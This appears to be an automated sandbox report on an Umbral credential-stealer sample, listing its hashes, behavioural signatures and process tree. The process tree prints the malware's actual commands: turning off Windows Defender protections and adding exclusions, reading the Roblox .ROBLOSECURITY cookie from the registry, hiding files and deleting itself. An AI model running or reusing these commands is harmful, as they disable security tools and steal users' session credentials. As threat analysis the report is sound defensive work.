Analysis
-
max time kernel
96s -
max time network
97s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
20-09-2024 23:44
Static task
static1
Behavioral task
behavioral1
Sample
18a0a32340d190a5b8c803fa84bae012a4a6f8c89ef228a74e40c7edd89b343bN.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
18a0a32340d190a5b8c803fa84bae012a4a6f8c89ef228a74e40c7edd89b343bN.exe
Resource
win10v2004-20240802-en
General
-
Target
18a0a32340d190a5b8c803fa84bae012a4a6f8c89ef228a74e40c7edd89b343bN.exe
-
Size
1.4MB
-
MD5
ce100b5ae4fe05c8fd8f44f7ad9f4b40
-
SHA1
19a77380a68da11304c9ba7c1048f7257ba4951f
-
SHA256
18a0a32340d190a5b8c803fa84bae012a4a6f8c89ef228a74e40c7edd89b343b
-
SHA512
b19f7cd1b558ef7f598adb84726c94c885696c31efdbd981d07df17b908cb23fd7098b6f8f622d584033b55dba1d264f68a734e60bd81cb5d3f5600a542652ca
-
SSDEEP
24576:6DiGBKBipGMOU5lRBixlkBg0BLchDLtVVi/FpPwgX2YVC0/xaTO3O:OiGBKBipGMOUXRBi4tuFtjCxB80/xP
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral2/memory/2876-6-0x0000000000400000-0x0000000000440000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3232 powershell.exe 4500 powershell.exe 2572 powershell.exe 4396 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts MSBuild.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk 18a0a32340d190a5b8c803fa84bae012a4a6f8c89ef228a74e40c7edd89b343bN.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 23 discord.com 24 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 656 set thread context of 2876 656 18a0a32340d190a5b8c803fa84bae012a4a6f8c89ef228a74e40c7edd89b343bN.exe 82 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe attrib.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 18a0a32340d190a5b8c803fa84bae012a4a6f8c89ef228a74e40c7edd89b343bN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1404 cmd.exe 756 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1140 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 756 PING.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 2876 MSBuild.exe 3232 powershell.exe 3232 powershell.exe 4500 powershell.exe 4500 powershell.exe 2572 powershell.exe 2572 powershell.exe 1584 powershell.exe 1584 powershell.exe 4396 powershell.exe 4396 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2876 MSBuild.exe Token: SeIncreaseQuotaPrivilege 2452 wmic.exe Token: SeSecurityPrivilege 2452 wmic.exe Token: SeTakeOwnershipPrivilege 2452 wmic.exe Token: SeLoadDriverPrivilege 2452 wmic.exe Token: SeSystemProfilePrivilege 2452 wmic.exe Token: SeSystemtimePrivilege 2452 wmic.exe Token: SeProfSingleProcessPrivilege 2452 wmic.exe Token: SeIncBasePriorityPrivilege 2452 wmic.exe Token: SeCreatePagefilePrivilege 2452 wmic.exe Token: SeBackupPrivilege 2452 wmic.exe Token: SeRestorePrivilege 2452 wmic.exe Token: SeShutdownPrivilege 2452 wmic.exe Token: SeDebugPrivilege 2452 wmic.exe Token: SeSystemEnvironmentPrivilege 2452 wmic.exe Token: SeRemoteShutdownPrivilege 2452 wmic.exe Token: SeUndockPrivilege 2452 wmic.exe Token: SeManageVolumePrivilege 2452 wmic.exe Token: 33 2452 wmic.exe Token: 34 2452 wmic.exe Token: 35 2452 wmic.exe Token: 36 2452 wmic.exe Token: SeIncreaseQuotaPrivilege 2452 wmic.exe Token: SeSecurityPrivilege 2452 wmic.exe Token: SeTakeOwnershipPrivilege 2452 wmic.exe Token: SeLoadDriverPrivilege 2452 wmic.exe Token: SeSystemProfilePrivilege 2452 wmic.exe Token: SeSystemtimePrivilege 2452 wmic.exe Token: SeProfSingleProcessPrivilege 2452 wmic.exe Token: SeIncBasePriorityPrivilege 2452 wmic.exe Token: SeCreatePagefilePrivilege 2452 wmic.exe Token: SeBackupPrivilege 2452 wmic.exe Token: SeRestorePrivilege 2452 wmic.exe Token: SeShutdownPrivilege 2452 wmic.exe Token: SeDebugPrivilege 2452 wmic.exe Token: SeSystemEnvironmentPrivilege 2452 wmic.exe Token: SeRemoteShutdownPrivilege 2452 wmic.exe Token: SeUndockPrivilege 2452 wmic.exe Token: SeManageVolumePrivilege 2452 wmic.exe Token: 33 2452 wmic.exe Token: 34 2452 wmic.exe Token: 35 2452 wmic.exe Token: 36 2452 wmic.exe Token: SeDebugPrivilege 3232 powershell.exe Token: SeDebugPrivilege 4500 powershell.exe Token: SeDebugPrivilege 2572 powershell.exe Token: SeDebugPrivilege 1584 powershell.exe Token: SeIncreaseQuotaPrivilege 1932 wmic.exe Token: SeSecurityPrivilege 1932 wmic.exe Token: SeTakeOwnershipPrivilege 1932 wmic.exe Token: SeLoadDriverPrivilege 1932 wmic.exe Token: SeSystemProfilePrivilege 1932 wmic.exe Token: SeSystemtimePrivilege 1932 wmic.exe Token: SeProfSingleProcessPrivilege 1932 wmic.exe Token: SeIncBasePriorityPrivilege 1932 wmic.exe Token: SeCreatePagefilePrivilege 1932 wmic.exe Token: SeBackupPrivilege 1932 wmic.exe Token: SeRestorePrivilege 1932 wmic.exe Token: SeShutdownPrivilege 1932 wmic.exe Token: SeDebugPrivilege 1932 wmic.exe Token: SeSystemEnvironmentPrivilege 1932 wmic.exe Token: SeRemoteShutdownPrivilege 1932 wmic.exe Token: SeUndockPrivilege 1932 wmic.exe Token: SeManageVolumePrivilege 1932 wmic.exe -
Suspicious use of WriteProcessMemory 47 IoCs
description pid Process procid_target PID 656 wrote to memory of 2876 656 18a0a32340d190a5b8c803fa84bae012a4a6f8c89ef228a74e40c7edd89b343bN.exe 82 PID 656 wrote to memory of 2876 656 18a0a32340d190a5b8c803fa84bae012a4a6f8c89ef228a74e40c7edd89b343bN.exe 82 PID 656 wrote to memory of 2876 656 18a0a32340d190a5b8c803fa84bae012a4a6f8c89ef228a74e40c7edd89b343bN.exe 82 PID 656 wrote to memory of 2876 656 18a0a32340d190a5b8c803fa84bae012a4a6f8c89ef228a74e40c7edd89b343bN.exe 82 PID 656 wrote to memory of 2876 656 18a0a32340d190a5b8c803fa84bae012a4a6f8c89ef228a74e40c7edd89b343bN.exe 82 PID 656 wrote to memory of 2876 656 18a0a32340d190a5b8c803fa84bae012a4a6f8c89ef228a74e40c7edd89b343bN.exe 82 PID 656 wrote to memory of 2876 656 18a0a32340d190a5b8c803fa84bae012a4a6f8c89ef228a74e40c7edd89b343bN.exe 82 PID 656 wrote to memory of 2876 656 18a0a32340d190a5b8c803fa84bae012a4a6f8c89ef228a74e40c7edd89b343bN.exe 82 PID 2876 wrote to memory of 2452 2876 MSBuild.exe 83 PID 2876 wrote to memory of 2452 2876 MSBuild.exe 83 PID 2876 wrote to memory of 2452 2876 MSBuild.exe 83 PID 2876 wrote to memory of 1332 2876 MSBuild.exe 86 PID 2876 wrote to memory of 1332 2876 MSBuild.exe 86 PID 2876 wrote to memory of 1332 2876 MSBuild.exe 86 PID 2876 wrote to memory of 3232 2876 MSBuild.exe 88 PID 2876 wrote to memory of 3232 2876 MSBuild.exe 88 PID 2876 wrote to memory of 3232 2876 MSBuild.exe 88 PID 2876 wrote to memory of 4500 2876 MSBuild.exe 93 PID 2876 wrote to memory of 4500 2876 MSBuild.exe 93 PID 2876 wrote to memory of 4500 2876 MSBuild.exe 93 PID 2876 wrote to memory of 2572 2876 MSBuild.exe 95 PID 2876 wrote to memory of 2572 2876 MSBuild.exe 95 PID 2876 wrote to memory of 2572 2876 MSBuild.exe 95 PID 2876 wrote to memory of 1584 2876 MSBuild.exe 98 PID 2876 wrote to memory of 1584 2876 MSBuild.exe 98 PID 2876 wrote to memory of 1584 2876 MSBuild.exe 98 PID 2876 wrote to memory of 1932 2876 MSBuild.exe 100 PID 2876 wrote to memory of 1932 2876 MSBuild.exe 100 PID 2876 wrote to memory of 1932 2876 MSBuild.exe 100 PID 2876 wrote to memory of 1044 2876 MSBuild.exe 102 PID 2876 wrote to memory of 1044 2876 MSBuild.exe 102 PID 2876 wrote to memory of 1044 2876 MSBuild.exe 102 PID 2876 wrote to memory of 1700 2876 MSBuild.exe 104 PID 2876 wrote to memory of 1700 2876 MSBuild.exe 104 PID 2876 wrote to memory of 1700 2876 MSBuild.exe 104 PID 2876 wrote to memory of 4396 2876 MSBuild.exe 106 PID 2876 wrote to memory of 4396 2876 MSBuild.exe 106 PID 2876 wrote to memory of 4396 2876 MSBuild.exe 106 PID 2876 wrote to memory of 1140 2876 MSBuild.exe 110 PID 2876 wrote to memory of 1140 2876 MSBuild.exe 110 PID 2876 wrote to memory of 1140 2876 MSBuild.exe 110 PID 2876 wrote to memory of 1404 2876 MSBuild.exe 112 PID 2876 wrote to memory of 1404 2876 MSBuild.exe 112 PID 2876 wrote to memory of 1404 2876 MSBuild.exe 112 PID 1404 wrote to memory of 756 1404 cmd.exe 114 PID 1404 wrote to memory of 756 1404 cmd.exe 114 PID 1404 wrote to memory of 756 1404 cmd.exe 114 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1332 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\18a0a32340d190a5b8c803fa84bae012a4a6f8c89ef228a74e40c7edd89b343bN.exe"C:\Users\Admin\AppData\Local\Temp\18a0a32340d190a5b8c803fa84bae012a4a6f8c89ef228a74e40c7edd89b343bN.exe"1⤵
- Drops startup file
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"2⤵
- Drops file in Drivers directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2452
-
-
C:\Windows\SysWOW64\attrib.exe"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1332
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3232
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4500
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2572
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
- System Location Discovery: System Language Discovery
PID:1044
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- System Location Discovery: System Language Discovery
PID:1700
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4396
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- System Location Discovery: System Language Discovery
- Detects videocard installed
PID:1140
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" && pause3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\SysWOW64\PING.EXEping localhost4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:756
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
18KB
MD506d1b749d3f35881cd5a3a066c655af2
SHA165f8a199248cabe8d1077d35f6e7f4c294a9fe15
SHA25685e2daf186c4d1eca8e77072f9f4b0f30fc94f62b63440ce2cf8e6e1d4e8aeb5
SHA5125eb1ecc58a6dfca5234bff29033709f8a689250942e6aed21d359eafc47e19cf14c771e1fa56e27c69755f56618a1616f5b11700727fb005e654b89abc8629db
-
Filesize
17KB
MD511df42ef53c5c2d3d8cc748044fd48bf
SHA1a25bd05d55aa51693b6fb208e8aee68ba4dd30f8
SHA256de11d7d7759cf6b002dcadf901d875fc09263658c2d14a73ca7d4a9c195efb3b
SHA51256439268a0e29f75be8a7cd5e678052c8896f496454dc1291a2760e78489427c67aa8ad733317c39e017804e03b594417c3960979545a185d4f70d440afa67a0
-
Filesize
18KB
MD56169b683e53d7621f05e7ca0339ada7d
SHA17981e397405376aac1f59d0474858820eaffffc6
SHA256037370a974f906aead4c5a8a6b5fc5e6ee63ad89b36110ba5a2205cb5fa9ad91
SHA512dcda3b938ef621264486dc90338458cece2dcdf05a879a7c1c46e0af7dfcb4272b5e65ae72ace121f1432522b4bb90065f5acd694660709e1f2dd43681ef53b6
-
Filesize
15KB
MD59cc92f8c5c8ecb1048d7583ec74e235a
SHA167d21971effb76d3863a69eb97f4cba907cbf0c0
SHA256f0cfd88c0fdbf6e384628ace82a8227b43054df7c1ed22378193e9f848247986
SHA5122d80a8191367e571b7f5aa563eae73b78c39b40c46d537365e1d3cabb6a75249ee2010dee0b0550d96e7efa5a42270794e46e892c8cd15c111441f64d04899ab
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82